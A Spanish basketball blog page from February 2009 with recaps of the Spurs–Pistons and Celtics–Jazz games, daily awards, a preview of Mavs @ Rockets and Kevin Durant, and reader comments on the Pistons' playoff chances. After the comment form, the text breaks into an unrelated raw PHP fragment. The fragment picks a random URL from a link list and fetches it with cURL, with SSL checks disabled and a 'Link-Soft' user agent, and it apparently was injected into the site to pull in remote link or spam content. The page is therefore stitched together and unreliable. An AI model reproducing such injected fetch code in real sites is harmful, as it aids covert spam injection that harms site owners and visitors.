La crónica (19/02/2009)

20 de February de 2009 por MagicJohnson32

Esta mañana, muchos amaneceréis más interesados por toda la actividad de despachos de anoche que por la competición. A riesgo de que prefiráis abandonar urgentemente esta entrada en favor del detallado informe preparado por Txusma sobre el trade deadline, os contamos qué nos depararon los dos partidos que se jugaron la pasada madrugada.kglesion

Spurs 83 – 79 Pistons. Los Spurs elevaron a 5 la racha de derrotas de los Pistons pese a saber poco antes del partido que Manu Ginóbili se perderá entre 2 y 3 semanas por su lesión de tobillo. Los de Detroit, que han perdido 10 de sus últimos 12 partidos como locales, volvieron a caer en un final igualado (sus cinco derrotas seguidas han sido por menos de 10 puntos) tras desperdiciar la oportunidad de ponerse por delante a pocos segundos de la conclusión. Duncan volvió a llevar el peso de su equipo con 18 puntos, 18 rebotes y 3 tapones, bien apoyado por los 19 puntos, 11 asistencias y 5 rebotes de Parker. Por parte de los Pistons, que jugaron con sólo 7 hombres, Iverson fue el mejor con 31 puntos y 7 asistencias, pero sólo McDyess y Maxiell cumplieron en sus roles. Curry y los suyos ya están más cerca de la 9ª posición que de la 4ª, y como decíamos ayer, su calendario es como para preocuparse.

Celtics 85 – 90 Jazz. Los aficionados de los Celtics se llevaron un buen susto anoche cuando Garnett sufrió una lesión en la rodilla derecha durante la primera mitad del partido contra los Jazz. Por el momento se desconoce la gravedad, pero el hecho de que Garnett hicieran el calentamiento en el descanso es sin duda una buena señal. La mala noticia no vino sola y los Celtics cayeron en Salt Lake City en un partido que los locales remontaron con un parcial de 19-30 en el último cuarto. Deron dirigió las operaciones, Okur regresó con 19 puntos tras su baja por gripe y Matt Harpring resultó clave con su defensa sobre Pierce en el último cuarto y con una canasta para poner por delante a los locales a un minuto de la conclusión. Los Celtics encajan así su duodécima derrota de la temporada, una más que los Cavs y dos más que los Lakers.

duncanmcdyessPREMIOS

MVP: La noche ha sido más bien cicatera en cuanto a grandes actuaciones. En todo caso, Duncan y Deron Williams condujeron a sus respectivos equipos a la victoria y comparten el galardón del día.

El rookie: Sólo jugaron dos novatos, ambos en los Spurs. El mejor de ambos fue George Hill, que en 19 minutos anotó sus dos tiros, dio 2 asistencias, puso 3 tapones y atrapó un rebote.

La sorpresa: ¿Es posible cometer seis faltas en menos de 12 minutos de juego? Brian Scalabrine nos demostró que sí es posible.

La decepción: Unos tristes 23 puntos con 9 de 37 en tiros de campo acumularon Wallace, Prince y Hamilton. Pocos partidos ganarán los Pistons con actuaciones así de su trío de veteranos.

El mayor esfuerzo en vano: Allen Iverson anotó 31 puntos, casi el 40% de los de su equipo, y añadió 7 asistencias, 3 rebotes y 2 robos a su actuación ante los Spurs. Al final tuvo un triple para forzar la prórroga y lo falló, pero nadie podrá decir hoy que la derrota fuese culpa suya.

RAZONES PARA TRASNOCHAR

Muchas y variadas son las razones para pasar sueño esta próxima madrugada. Para empezar, podremos ver a muchos jugadores debutar con sus nuevos equipos. Nosotros, sin embargo, os seleccionamos como cada día un partido y un jugador a los que conviene prestar especial atención.

Mavs @ Rockets. El duelo texano llega con ambos equipos igualados en cuanto a derrotas (21) e implicados en la lucha por una plaza de Playoffs. En Houston empiezan a hacerse a la idea de no volver a contar con McGrady en lo que resta de temporada y, además, mandaron a Rafer Alston a Orlando a cambio de kdurantmvpBrian Cook y Kyle Lowry. Esperamos por tanto un mayor protagonismo de Aaron Brooks, Battier y Ron Artest, con el evidente peligro que encierra esto último. Por su parte, los Mavs parecen sobrellevar la baja de Jason Terry, en gran medida porque Josh Howard parece haber dado un paso adelante desde la lesión de su compañero. Además, Jason Kidd ha enlazado por primera vez esta temporada cuatro partidos seguidos de más de 10 asistencias y Nowitzki, aunque ha bajado sensiblemente su contribución en los rebotes, sigue anotando con suma facilidad. Veremos el duelo en OK Corral a partir de las 2:00 h.

Kevin Durant. ¿Alguien se ha fijado en el promedio anotador de Kevin Durant este mes? ¿Y en sus porcentajes en tiros de campo? ¿Y en sus porcentajes en triples? Pues háganlo: en los siete partidos disputados en febrero, Durant ha promediado 33 puntos con un 53% en tiros de campo y un 56% en triples, además de 6 rebotes y 3.6 asistencias. Y también ha tenido tiempo de romper todos los registros de anotación en el partido de Rookies vs Sophomores del All-Star Weekend. Esta noche, a partir de las 3:00 horas, visita a los Suns, que no vendrían a ser el paradigma de la defensa.

La pregunta del día: ¿Crees que los Pistons pueden quedarse fuera de los Playoffs?

Comenta

6 comentarios a esta entrada

  1. Txusma dice:
    #1

    Me parece complicado que una plantilla con Iverson, Wallace, Prince y Hamilton se quede fuera de Playoffs pero si siguen por el mismo camino van a acabar metidos de lleno en la lucha. De momento llevan una buena ventaja pero por detras ya aprietan.

      Citar

  2. TheDeerHunter dice:
    #2

    Bueno… yo tampoco creo que haya que exagerar…
    en el este, quitando Cavs y Boston cada uno tiene sus propios problemas.

    La racha de Detroit es pésima… pero no mucho peor que la mayoría de los que vienen detrás (Nets, Indiana, Charlotte, New York…) ni tampoco que Philadelphia o Miami.

    No, me parece casi imposible que se caigan.

      Citar

  3. javi dice:
    #3

    Coincido… aunque con algunas reservas.
    He leído en algún artículo de la prensa de Detroit q hay bastant mal rollito en el equipo, demasiados egos y no se si se les estará llendo de las manos, parece que si….De todas formas playoff casi seguro, aunque probablemente fuera a las primeras de cambio.

    Por otro lado esta situación viene años anunciándose, empiezan a parecer el equipo de abueletes, ese con el que todo el mundo quiere jugar a no ser que tengan el dia inspirado y con ganas, se dejan llevar.

    Felicidades x el blog, me parece cojon….

      Citar

  4. MagicJohnson32 dice:
    #4

    Muchas gracias, Javi.

    Acabo de leer que se ha acabado la temporada para Amare porque se ha de operar los ojos. ¿Adiós a los Suns?

      Citar

  5. UnderlocK dice:
    #5

    He leído antes lo de Amare, y salvo que Shaq rejuvenezca 5 años, lo van a tener muy chungo para entrar en playoffs. Y mas ahora, que parecian que remontaban el vuelo… jodido.

    Y respecto a Detroit, es casi imposible que no entren a playoffs viendo como esta el Este de ‘facil’ para acceder, eso si, se acabó el ciclo y es mejor ir pensando en la proxima temporada e ir renovando al equipo.

      Citar

  6. Miguel dice:
    #6

    Yo no daría por muertos a los Suns, en el partido de hoy parece que Barbosa y Richardson han dado un paso adelante, record de anotación para el brasileño. Yo miraria más a Houston.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>